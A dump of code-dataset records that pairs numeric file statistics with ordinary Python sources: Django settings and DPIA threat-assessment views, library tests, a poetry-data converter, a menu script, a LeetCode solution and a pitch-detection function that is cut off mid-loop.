| 0.449417
| 2,659
| 119
| 101
| 22.344538
| 0.644126
| 0
| 0
| 0.443478
| 0
| 0.008696
| 0.345995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008696
| 0
| 0.008696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88b1ab4a72c456e8f8edbf2cf4dc0a0cd36b09d4
| 517
|
py
|
Python
|
my_lambdata/my_mod.py
|
tatianaportsova/Lambdata_12
|
4cab1dc4f65d479b8f2919155c4bb6b58243d8db
|
[
"MIT"
] | null | null | null |
my_lambdata/my_mod.py
|
tatianaportsova/Lambdata_12
|
4cab1dc4f65d479b8f2919155c4bb6b58243d8db
|
[
"MIT"
] | null | null | null |
my_lambdata/my_mod.py
|
tatianaportsova/Lambdata_12
|
4cab1dc4f65d479b8f2919155c4bb6b58243d8db
|
[
"MIT"
] | null | null | null |
# my_lambdata/my_mod.py
def enlarge(n):
"""
Param n is a number
Function will enlarge the number
"""
return n * 100
# this code breaks our ability to import enlarge from other files
# print("HELLO")
# y = int(input("Please choose a number"))
# print(y, enlarge(y))
if __name__ == "__main__":
# only runs the code if the script is invoked from the command line,
# not if it is imported from another file
print("HELLO")
y = int(input("Please choose a number"))
print(y, enlarge(y))
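Editor's sketch: the import-side behavior the comments above describe; thanks to the __main__ guard, importing stays silent (assumes the package layout in the header comment).

from my_lambdata.my_mod import enlarge

assert enlarge(5) == 500  # no prompts fire on import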
| 21.541667
| 67
| 0.651838
| 80
| 517
| 4.0875
| 0.575
| 0.06422
| 0.067278
| 0.085627
| 0.318043
| 0.318043
| 0.318043
| 0.318043
| 0.318043
| 0.318043
| 0
| 0.007614
| 0.237911
| 517
| 23
| 68
| 22.478261
| 0.822335
| 0.60735
| 0
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0
| 0.333333
| 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88b2a19329a06c11a7f27402a51fc753d23d3562
| 1,291
|
py
|
Python
|
DB_resource/code/ci.py
|
DaiShuHeng/shiyizhonghua_resource
|
6faa284292102ab97438f356cf9bf69d2472335b
|
[
"Apache-2.0"
] | null | null | null |
DB_resource/code/ci.py
|
DaiShuHeng/shiyizhonghua_resource
|
6faa284292102ab97438f356cf9bf69d2472335b
|
[
"Apache-2.0"
] | 1
|
2021-11-29T03:38:21.000Z
|
2021-11-29T03:38:21.000Z
|
DB_resource/code/ci.py
|
DaiShuHeng/shiyizhonghua_resource
|
6faa284292102ab97438f356cf9bf69d2472335b
|
[
"Apache-2.0"
] | 13
|
2021-11-06T03:17:45.000Z
|
2021-12-02T15:12:54.000Z
|
# -*- coding: utf-8 -*-
"""
Author: 王林清 on 2021/11/2 13:02
FileName:ci.py in shiyizhonghua_resource
Tools:PyCharm python3.8.4
"""
from util import get_time_str, get_json, get_file_path, save_json, \
save_split_json
if __name__ == '__main__':
dir_name = r'./../data/ci'
authors = {}
ci_jsons = []
paths = get_file_path(dir_name)
author_path = paths.pop(0)
author_dicts = get_json(author_path)
for author in author_dicts:
name = author['name']
authors[name] = {
'name': name,
'time': '宋',
'desc': author['description'],
}
for path in paths:
try:
ci_json = get_json(path)
for ci in ci_json:
time = get_time_str()
ci_jsons.append(
{
'title': ci['rhythmic'],
'author': authors[ci['author']],
'type': '词',
'content': ci['paragraphs'],
'create_time': time,
'update_time': time,
'valid_delete': True
}
)
except Exception as ex:
print(f'{path}:{ex}')
save_split_json('ci', ci_jsons)
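Editor's note: the shape of one record appended to ci_jsons above; every value below is illustrative, including the timestamp format returned by get_time_str().

example_record = {
    'title': '水调歌头',
    'author': {'name': '苏轼', 'time': '宋', 'desc': '...'},
    'type': '词',
    'content': ['明月几时有', '把酒问青天'],
    'create_time': '2021-11-02 13:02:00',  # placeholder for get_time_str()
    'update_time': '2021-11-02 13:02:00',
    'valid_delete': True,
}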
| 26.346939
| 68
| 0.473277
| 141
| 1,291
| 4.056738
| 0.48227
| 0.036713
| 0.034965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020752
| 0.402789
| 1,291
| 48
| 69
| 26.895833
| 0.721141
| 0.0945
| 0
| 0
| 0
| 0
| 0.122308
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88b2a9e556e312a49635b929210b47f14c9cd821
| 2,307
|
py
|
Python
|
tools/pfif-tools/app/settings.py
|
priyanshu-kumar02/personfinder
|
d5390b60709cd0ccaaade9a3b6224a60cd523ed9
|
[
"Apache-2.0"
] | 561
|
2015-02-16T07:59:42.000Z
|
2022-03-30T17:31:21.000Z
|
tools/pfif-tools/app/settings.py
|
Anthonymcqueen21/personfinder
|
ee7791fbc434eb4ec5cfad449288a1e884db5b1e
|
[
"Apache-2.0"
] | 591
|
2015-01-30T05:09:30.000Z
|
2022-02-26T09:31:25.000Z
|
tools/pfif-tools/app/settings.py
|
Anthonymcqueen21/personfinder
|
ee7791fbc434eb4ec5cfad449288a1e884db5b1e
|
[
"Apache-2.0"
] | 258
|
2015-01-25T18:35:12.000Z
|
2021-12-25T01:44:14.000Z
|
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# If we actually did anything that used the secret key we'd need to set it to
# some constant value and find a way to secretly store it. However, pfif-tools
# doesn't use it for anything. We need to set it to something to make Django
# happy though, and we set it to something random to be safe in case we
# unknowingly do something in the future that uses it (better to have a password
# reset token break because this changed or something like that than a security
# hole we don't know about).
SECRET_KEY = os.urandom(30)
if 'Development' in os.environ.get('SERVER_SOFTWARE', ''):
DEBUG = True
# If DEBUG is True and ALLOWED_HOSTS is empty, Django permits localhost.
ALLOWED_HOSTS = []
else:
DEBUG = False
ALLOWED_HOSTS = ['pfif-tools.appspot.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['resources'],
'APP_DIRS': False,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
],
},
},
]
WSGI_APPLICATION = 'wsgi.application'
# Internationalization
LANGUAGE_CODE = 'en'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
| 26.825581
| 80
| 0.706545
| 313
| 2,307
| 5.134185
| 0.584665
| 0.037337
| 0.013068
| 0.019913
| 0.036092
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007605
| 0.201994
| 2,307
| 85
| 81
| 27.141176
| 0.865291
| 0.513654
| 0
| 0
| 0
| 0
| 0.391067
| 0.28897
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.026316
| 0
| 0.026316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88b4ec64c6302ef8adda35ec81fbd48bb0e0a469
| 2,379
|
py
|
Python
|
tests/test_types.py
|
RodrigoDeRosa/related
|
3799cde862b8c9500931706f5f1ce5576028f642
|
[
"MIT"
] | 190
|
2017-05-25T11:57:15.000Z
|
2022-03-17T01:44:53.000Z
|
tests/test_types.py
|
RodrigoDeRosa/related
|
3799cde862b8c9500931706f5f1ce5576028f642
|
[
"MIT"
] | 42
|
2017-06-11T14:05:11.000Z
|
2021-12-14T21:12:07.000Z
|
tests/test_types.py
|
RodrigoDeRosa/related
|
3799cde862b8c9500931706f5f1ce5576028f642
|
[
"MIT"
] | 18
|
2018-01-05T08:47:30.000Z
|
2022-01-28T06:24:05.000Z
|
# coding=utf-8
from related.types import TypedSequence, TypedMapping, TypedSet, ImmutableDict
from attr.exceptions import FrozenInstanceError
from related.converters import str_if_not_none
from collections import OrderedDict
import pytest
def test_immutable_dict():
immutable = ImmutableDict(dict(a=1))
with pytest.raises(FrozenInstanceError):
del immutable['a']
assert immutable == dict(a=1)
with pytest.raises(FrozenInstanceError):
immutable['b'] = 2
assert immutable == dict(a=1)
with pytest.raises(FrozenInstanceError):
immutable.clear()
assert immutable == dict(a=1)
with pytest.raises(FrozenInstanceError):
immutable.pop('a')
assert immutable == dict(a=1)
with pytest.raises(FrozenInstanceError):
immutable.something = 0
assert immutable == dict(a=1)
with pytest.raises(FrozenInstanceError):
del immutable.something_else
assert immutable == dict(a=1)
def test_str_if_not_none():
unicode_value = "Registered Trademark ®"
assert unicode_value == str_if_not_none(unicode_value)
assert "1" == str_if_not_none(1)
assert str_if_not_none(None) is None
def test_sequence():
lst = ["a", "b", "c"]
seq = TypedSequence(str, lst)
assert seq == lst
assert str(seq) == str(lst)
assert repr(seq) == repr(lst)
assert len(seq) == len(lst)
del seq[1]
del lst[1]
assert seq == lst
seq[1] = "d"
assert seq != lst
with pytest.raises(TypeError):
seq[1] = 4.0
def test_mapping():
dct = OrderedDict(a=1, b=2, c=3)
map = TypedMapping(int, dct)
assert map == dct
assert str(map) == str(dct)
assert repr(map) == repr(dct)
assert len(map) == len(dct)
del map["b"]
del dct["b"]
assert map == dct
with pytest.raises(TypeError):
map["d"] = 4.0
with pytest.raises(TypeError):
map.add(5)
map.add(4, 'd')
dct['d'] = 4
assert map == dct
def test_set():
orig = {"a", "b", "c"}
typed = TypedSet(str, orig)
assert orig == typed
assert len(orig) == len(typed)
assert 'a' in str(typed)
assert 'a' in repr(typed)
typed.add("d")
assert "d" in typed
assert orig != typed
typed.discard("d")
assert "d" not in typed
assert orig == typed
with pytest.raises(TypeError):
typed.add(5)
| 21.432432
| 78
| 0.628415
| 322
| 2,379
| 4.568323
| 0.204969
| 0.067981
| 0.10877
| 0.040789
| 0.375255
| 0.292998
| 0.260367
| 0.260367
| 0.260367
| 0.17811
| 0
| 0.015008
| 0.2438
| 2,379
| 110
| 79
| 21.627273
| 0.802112
| 0.005044
| 0
| 0.302632
| 0
| 0
| 0.018605
| 0
| 0
| 0
| 0
| 0
| 0.381579
| 1
| 0.065789
| false
| 0
| 0.065789
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88b6a45922cec7be62ee13004dcced019e40a855
| 2,203
|
py
|
Python
|
ex115Library/home.py
|
pepev123/PythonEx
|
8f39751bf87a9099d7b733aa829988595dab2344
|
[
"MIT"
] | null | null | null |
ex115Library/home.py
|
pepev123/PythonEx
|
8f39751bf87a9099d7b733aa829988595dab2344
|
[
"MIT"
] | null | null | null |
ex115Library/home.py
|
pepev123/PythonEx
|
8f39751bf87a9099d7b733aa829988595dab2344
|
[
"MIT"
] | null | null | null |
def inicio():
print('\033[33m=' * 60)
print('MENU PRINCIPAL'.center(50))
print('=' * 60)
print('\033[34m1\033[m - \033[35mCadastrar nova pessoa\033[m')
print('\033[34m2\033[m - \033[35mVer pessoas cadastradas\033[m')
print('\033[34m3\033[m - \033[35mSair do Sistema\033[m')
print('\033[33m=\033[m' * 60)
def escolha():
while True:
try:
escolha = int(input('Sua escolha: '))
while escolha > 3 or escolha < 1:
print('\033[31mValor digitado não condiz com a tabela\033[m')
escolha = int(input('Sua escolha: '))
except ValueError:
print('\033[31mValor digitado não condiz com a tabela\033[m')
else:
break
return escolha
def arquivoExiste(nome):
try:
arquivo = open(nome, 'rt')
arquivo.close()
except (FileNotFoundError):
return False
else:
return True
def criarArquivo(nome):
try:
arquivo = open(nome, 'wt+')
arquivo.close()
except:
print('Houve algum erro')
def opcao1(arquivo):
print('\033[33m-' * 60)
print('CADASTRAR PESSOA'.center(50))
print('\033[33m-\033[m' * 60)
nome = input('Digite o nome: ')
idade = int(input('Digite a idade: '))
try:
arquivo = open(arquivo, 'at')
except:
print('Arquivo não conseguiu ser aberto')
else:
try:
arquivo.write(f'{nome};{idade}\n')
except:
print('Não consegui computar')
else:
print('Pessoa cadastrada com sucesso!')
arquivo.close()
def opcao2(nome):
print('\033[33m-' * 60)
print('LISTA DE PESSOAS'.center(50))
print('\033[33m-\033[m' * 60)
try:
arquivo = open(nome, 'rt')
except:
print('Arquivo não conseguiu ser aberto')
else:
print('...')
print(f'Nome Idade')
print('-' * 60)
for linha in arquivo:
dado = linha.split(';')
dado[1] = dado[1].replace('\n', '')
print(f'{dado[0]:<30}{dado[1]:>3} anos')
arquivo.close()
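Editor's sketch: a driver loop tying the functions above together, assuming they live in home.py; the data file name is arbitrary.

from home import inicio, escolha, arquivoExiste, criarArquivo, opcao1, opcao2

arquivo = 'pessoas.txt'
if not arquivoExiste(arquivo):
    criarArquivo(arquivo)
while True:
    inicio()
    opcao = escolha()
    if opcao == 1:
        opcao1(arquivo)
    elif opcao == 2:
        opcao2(arquivo)
    else:
        break  # option 3: leave the system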
| 28.61039
| 77
| 0.523831
| 264
| 2,203
| 4.371212
| 0.329545
| 0.076257
| 0.057192
| 0.033795
| 0.361352
| 0.214038
| 0.199307
| 0.199307
| 0.081456
| 0.081456
| 0
| 0.094758
| 0.324557
| 2,203
| 77
| 78
| 28.61039
| 0.68078
| 0
| 0
| 0.478873
| 0
| 0
| 0.30127
| 0.011343
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084507
| false
| 0
| 0
| 0
| 0.126761
| 0.338028
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31eefe99531de5ae9af50c89852e0a1767f078c7
| 12,523
|
py
|
Python
|
dpia/views/threats.py
|
ait-csr/dpia-tool
|
458f106e25b1d3bd2f07fd9df18bde880f4edc4a
|
[
"MIT"
] | 4
|
2018-12-25T05:53:17.000Z
|
2022-02-07T10:07:06.000Z
|
dpia/views/threats.py
|
ait-csr/dpia-tool
|
458f106e25b1d3bd2f07fd9df18bde880f4edc4a
|
[
"MIT"
] | 9
|
2020-02-12T00:57:33.000Z
|
2022-03-11T23:24:13.000Z
|
dpia/views/threats.py
|
CSR-AIT/dpia-tool
|
458f106e25b1d3bd2f07fd9df18bde880f4edc4a
|
[
"MIT"
] | null | null | null |
from dpia.modules import *
# @primary_assets_required
# @supporting_assets_required
@login_required
def threat_identification(request, q_id=None):
'''
Shows a list of the added supporting assets which are assigned to a primary asset.
The user here selects threats from the list of generic threats or adds a new threat to a supporting asset.
'''
user = request.user
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=q_id)
# query supporting assets
supporting_assets = Supporting.objects.filter(supporting_in_psrel__primary__questionaire=q).distinct()
args = {}
args.update(csrf(request))
args['q'] = q
args['supporting_assets'] = supporting_assets
return render(request, "threats/threat_identification.html", args)
# supporting-asset add
@login_required
def threat_sa_rel_add(request, sa_id=None):
'''
Adds generic threats to a supporting asset.
'''
user = request.user
supporting_object = get_object_or_404(Supporting, id=sa_id)
if supporting_object:
pa_sa_rel = PrimarySupportingRel.objects.filter(supporting=supporting_object)[0] # [0]: to select only one object when there are duplicates
primary_id = pa_sa_rel.primary_id
primary = get_object_or_404(Primary, id=primary_id)
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=primary.questionaire_id)
data = dict()
## Add Threats to a SA
if request.POST and request.is_ajax():
if 'threat' in request.POST:
with reversion.create_revision():
checked_threats = request.POST.getlist('threat')
threat_list = []
for checked_threat in checked_threats:
threat_object = get_object_or_404(Threat, id=checked_threat)
# create a new relationship with the above objects, no duplicates
rel, created = Threat_SA_REL.objects.get_or_create(affected_supporting_asset=supporting_object, threat=threat_object)
threat_list.append(threat_object.name)
comment = ", ".join(threat_list)
# Store some meta-information.
save_revision_meta(user, q, 'Added generic threats "%s" to supporting asset "%s".' %(comment, supporting_object))
## ajax data
django_messages = []
messages.success(request, u'Generic threats were added successfully to supporting asset "%s".' %(supporting_object))
for message in messages.get_messages(request):
django_messages.append({
"level": message.level,
"message": message.message,
"extra_tags": message.tags,
})
data['messages'] = django_messages
data['form_is_valid'] = True
# query supporting assets
supporting_assets = Supporting.objects.filter(supporting_in_psrel__primary__questionaire=q).distinct()
args = {}
args['q'] = q
args['supporting_assets'] = supporting_assets
data['html_q_list'] = render_to_string('threats/partial_threats_list.html', args)
else:
data['form_is_valid'] = False
# query generic_threats and each newly created Threat per questionnaire
generic_threats = Threat.objects.all() #.exclude(~Q(threat_sa_rel__affected_supporting_asset__primary__questionaire=q), threat_sa_rel__affected_supporting_asset__primary__questionaire__isnull=False).order_by("type_of_jeopardy")
# # query threats the user selects // of the instant questionaire
# selected_threats = Threat_SA_REL.objects.prefetch_related().all().filter(affected_supporting_asset__primary__questionaire=q).distinct()
args = {}
args.update(csrf(request))
args['q'] = q
args['supporting_object'] = supporting_object
args['generic_threats'] = generic_threats
args['primary'] = primary
data['html_form'] = render_to_string('threats/threat_sa_rel_add.html', args, request=request)
return JsonResponse(data)
@login_required
def threat_add(request, q_id=None, sa_id=None):
'''
Adds new threats (defined by the user) to a supporting asset.
'''
user = request.user
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=q_id)
sa = get_object_or_404(Supporting, id=sa_id)
data = dict()
## Add Threat
threat_form = ThreatForm(request.POST or None)
if request.POST and request.is_ajax():
if threat_form.is_valid():
with reversion.create_revision():
threat = threat_form.save(commit=False)
threat.supporting_asset_type = sa.supporting_type
threat.save()
new_threat_sa_rel = Threat_SA_REL.objects.get_or_create(affected_supporting_asset=sa, threat=threat)
# Store some meta-information.
save_revision_meta(user, q, 'Added new threat "%s" to supporting asset "%s".' %(threat.name, sa))
## ajax data
django_messages = []
messages.success(request, u'New threat "%s" was added successfully to supporting asset "%s".' %(threat.name, sa))
for message in messages.get_messages(request):
django_messages.append({
"level": message.level,
"message": message.message,
"extra_tags": message.tags,
})
data['messages'] = django_messages
data['form_is_valid'] = True
# query supporting assets
supporting_assets = Supporting.objects.filter(supporting_in_psrel__primary__questionaire=q).distinct()
args = {}
args['q'] = q
args['supporting_assets'] = supporting_assets
data['html_q_list'] = render_to_string('threats/partial_threats_list.html', args)
else:
data['form_is_valid'] = False
args = {}
args.update(csrf(request))
args['q'] = q
args['sa'] = sa
args['threat_form'] = threat_form
data['html_form'] = render_to_string('threats/threat_add.html', args, request=request)
return JsonResponse(data)
@login_required
def threat_rel_delete(request, q_id=None, threat_id=None):
'''
Delete a relationship between threat and supporting asset.
It doesn't delete the threat completely; it simply removes it from the supporting asset it is assigned to.
'''
user = request.user
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=q_id)
threat_rel = get_object_or_404(Threat_SA_REL, id=threat_id)
data = dict()
if request.POST and request.is_ajax():
threat_rel.delete()
## ajax data
django_messages = []
messages.success(request, u'Threat "%s" was removed successfully from supporting asset "%s".' %(threat_rel.threat, threat_rel.affected_supporting_asset))
for message in messages.get_messages(request):
django_messages.append({
"level": message.level,
"message": message.message,
"extra_tags": message.tags,
})
data['form_is_valid'] = True
data['messages'] = django_messages
# query threats the user has selected and order by the MaxValue of the Sum
selected_threats = Threat_SA_REL.objects.filter(affected_supporting_asset__questionaire=q)
# query supporting assets
supporting_assets = Supporting.objects.filter(supporting_in_psrel__primary__questionaire=q).distinct()
args = {}
args['q'] = q
args['supporting_assets'] = supporting_assets
data['html_q_list'] = render_to_string('threats/partial_threats_list.html', args)
else:
args = {}
args.update(csrf(request))
args['q'] = q
args['threat_rel'] = threat_rel
data['html_form'] = render_to_string('threats/threat_rel_remove.html', args, request=request)
return JsonResponse(data)
# @supporting_assets_required
# @threats_required
@login_required
def threat_assessment(request, q_id=None):
'''
Shows a formset table of all the threats (ordered by their "likelihood" value) selected by the user in the step "Threat Identification".
It accepts two values, namely "level of vulnerability" and "risk source capability".
If either of them is entered above the max number value (4) or not entered at all, an error is raised.
The likelihood value is automatically calculated as the sum of the level of vulnerability and risk source capability.
'''
user = request.user
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=q_id)
# query threats the user has selected and order by the MaxValue of the Sum;
# and filter only those that have a relationship to a primary asset. the "is_null" filtering is done in case the user goes back to
# the primary list step to remove supporting assets.
selected_threats = q.get_threats()
## Selected threats formset
ThreatFormset = modelformset_factory(Threat_SA_REL, form=Threat_SA_REL_Form, extra=0)
threat_formset = ThreatFormset(queryset=selected_threats)
if request.POST:
if selected_threats.exists():
threat_formset = ThreatFormset(request.POST, request.FILES)
if threat_formset.is_valid():
with reversion.create_revision():
for form in threat_formset.forms:
threat = form.save(commit=False)
threat.likelihood = threat.level_of_vulnerability + threat.risk_source_capability
threat.save()
threat_formset.save()
threat_list = selected_threats.values_list('threat__name', flat=True)
comment = ", ".join(threat_list)
# Store some meta-information.
save_revision_meta(user, q, 'Assessed likelihood of threats "{}".'.format(comment))
messages.success(request, u'Likelihood of threats was assessed successfully.')
return redirect(reverse('risk_assessment', args=[q.id]))
else:
messages.error(request, u'Please fill out the required fields.')
else:
return redirect('risk_assessment', q.id)
args = {}
args.update(csrf(request))
args['q'] = q
args['selected_threats'] = selected_threats
args['threat_formset'] = threat_formset
return render(request, "threats/threat_assessment.html", args)
# @supporting_assets_required
# @threats_required
# @threat_assessment_required
# @risk_assessment_required
@login_required
def threat_controls(request, q_id=None):
'''
Shows a formset list of all the assessed threats.
The user is required to fill out only the controls field.
'''
user = request.user
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=q_id)
## query Threats
threats = q.get_threats()
ThreatFormset2 = modelformset_factory(Threat_SA_REL, form=Threat_SA_REL_Form2, extra=0)
if request.POST:
if threats.exists():
threat_formset = ThreatFormset2(request.POST, queryset=threats)
for form in threat_formset.forms:
form.fields['control'].required = True
with reversion.create_revision():
if threat_formset.is_valid():
threat_formset.save()
# Store some meta-information.
threat_list = threats.values_list('threat__name', flat=True)
comment = ", ".join(threat_list)
save_revision_meta(user, q, 'Implemented controls to threats "{}".'.format(comment))
messages.success(request, u'Controls were implemented successfully.')
return redirect(reverse('risk_mitigation', args=[q.id]))
else:
messages.error(request, u'Please fill out the required fields.')
else:
return redirect('risk_mitigation', q.id)
else:
threat_formset = ThreatFormset2(queryset=threats)
args = {}
args.update(csrf(request))
args['q'] = q
args['threat_formset'] = threat_formset
return render(request, "threats/threat_controls.html", args)
| 45.046763
| 231
| 0.649844
| 1,497
| 12,523
| 5.185705
| 0.137609
| 0.043282
| 0.019838
| 0.019838
| 0.600541
| 0.54296
| 0.498519
| 0.448023
| 0.404998
| 0.360943
| 0
| 0.004521
| 0.258245
| 12,523
| 277
| 232
| 45.209386
| 0.831198
| 0.19556
| 0
| 0.626316
| 0
| 0
| 0.131579
| 0.027627
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031579
| false
| 0
| 0.005263
| 0
| 0.089474
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31efc2692f61977bbe23784db9dd5034a2c6c959
| 1,153
|
py
|
Python
|
Week 2/id_165/LeetCode_105_165.py
|
larryRishi/algorithm004-05
|
e60d0b1176acd32a9184b215e36d4122ba0b6263
|
[
"Apache-2.0"
] | 1
|
2019-10-12T06:48:45.000Z
|
2019-10-12T06:48:45.000Z
|
Week 2/id_165/LeetCode_105_165.py
|
larryRishi/algorithm004-05
|
e60d0b1176acd32a9184b215e36d4122ba0b6263
|
[
"Apache-2.0"
] | 1
|
2019-12-01T10:02:03.000Z
|
2019-12-01T10:02:03.000Z
|
Week 2/id_165/LeetCode_105_165.py
|
larryRishi/algorithm004-05
|
e60d0b1176acd32a9184b215e36d4122ba0b6263
|
[
"Apache-2.0"
] | null | null | null |
# Construct a binary tree from its preorder and inorder traversals.
#
# Note:
# You may assume that duplicate elements do not exist in the tree.
#
# For example, given
#
# preorder traversal preorder = [3,9,20,15,7]
# inorder traversal inorder = [9,3,15,20,7]
#
# return the following binary tree:
#
#     3
#    / \
#   9  20
#      /  \
#     15   7
# Related Topics: Tree, Depth-First Search, Array
# leetcode submit region begin(Prohibit modification and deletion)
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def buildTreeNode(self, preorder, inorder):
if not preorder:
return None
root = preorder[0]
node = TreeNode(root)
partition = inorder.index(root)
node.left = self.buildTreeNode(preorder[1:partition + 1], inorder[0:partition])
node.right = self.buildTreeNode(preorder[partition + 1:], inorder[partition + 1:])
return node
def buildTree(self, preorder, inorder):
"""
:type preorder: List[int]
:type inorder: List[int]
:rtype: TreeNode
"""
return self.buildTreeNode(preorder, inorder)
# leetcode submit region end(Prohibit modification and deletion)
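Editor's sketch: rebuilding the example tree from the problem statement above and checking that the preorder round-trips.

def preorder_of(node):
    return [] if node is None else [node.val] + preorder_of(node.left) + preorder_of(node.right)

root = Solution().buildTree([3, 9, 20, 15, 7], [9, 3, 15, 20, 7])
assert preorder_of(root) == [3, 9, 20, 15, 7]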
| 19.542373
| 90
| 0.608846
| 134
| 1,153
| 5.208955
| 0.455224
| 0.06447
| 0.10745
| 0.017192
| 0.020057
| 0
| 0
| 0
| 0
| 0
| 0
| 0.032335
| 0.275802
| 1,153
| 58
| 91
| 19.87931
| 0.803593
| 0.356461
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0
| 0
| 0.470588
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31f50a275cce9e7222985c09de6a704fd2d856df
| 1,575
|
py
|
Python
|
pyACA/PitchTimeAmdf.py
|
ruohoruotsi/pyACA
|
339e9395b65a217aa5965638af941b32d5c95454
|
[
"MIT"
] | null | null | null |
pyACA/PitchTimeAmdf.py
|
ruohoruotsi/pyACA
|
339e9395b65a217aa5965638af941b32d5c95454
|
[
"MIT"
] | null | null | null |
pyACA/PitchTimeAmdf.py
|
ruohoruotsi/pyACA
|
339e9395b65a217aa5965638af941b32d5c95454
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
computes the pitch from the lag of the AMDF function
Args:
x: audio signal
iBlockLength: block length in samples
iHopLength: hop length in samples
f_s: sample rate of the audio data
Returns:
f: frequency
t: time stamp for the frequency value
"""
import numpy as np
import math
def PitchTimeAmdf(x, iBlockLength, iHopLength, f_s):
# initialize
f_max = 2000
f_min = 50
iNumOfBlocks = math.ceil(x.size / iHopLength)
# compute time stamps
t = (np.arange(0, iNumOfBlocks) * iHopLength + (iBlockLength / 2)) / f_s
# allocate memory
f = np.zeros(iNumOfBlocks)
eta_min = int(round(f_s / f_max)) - 1
eta_max = int(round(f_s / f_min)) - 1
for n in range(0, iNumOfBlocks):
i_start = n * iHopLength
i_stop = np.min([x.size - 1, i_start + iBlockLength - 1])
# calculate the AMDF
if not x[np.arange(i_start, i_stop + 1)].sum():
continue
else:
x_tmp = x[np.arange(i_start, i_stop + 1)]
afCorr = computeAmdf(x_tmp, eta_max)
# find the coefficients specified in eta
f[n] = np.argmin(afCorr[np.arange(eta_min + 1, afCorr.size)]) + 1
# convert to Hz
f[n] = f_s / (f[n] + eta_min + 1)
return (f, t)
def computeAmdf(x, eta_max):
K = x.shape[0]
if K <= 0:
return 0
afAmdf = np.ones(K)
for eta in range(0, np.min([K, eta_max + 1])):
